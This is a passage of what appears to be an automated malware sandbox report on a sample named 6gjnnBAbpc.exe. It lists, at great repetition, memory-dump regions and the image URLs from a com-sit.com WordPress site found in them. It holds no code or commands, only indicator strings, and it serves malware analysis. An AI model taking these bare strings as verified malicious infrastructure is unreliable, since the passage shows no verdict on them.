00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-175x146.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-300x250.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-50x42.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-768x639.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019-90x75.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Home-ACTIVATION_2019.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-175x146.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-300x250.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-50x42.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-768x639.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE-90x75.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_01_PORSCHE.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-175x146.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-300x250.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-50x42.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-768x639.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-90x75.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-175x146.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-300x250.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-50x42.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-768x639.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY-90x75.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_03_DELIVERY.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/FOOTER.jpg);background-repeat:no-repeat;backgroun
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-1024x375.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 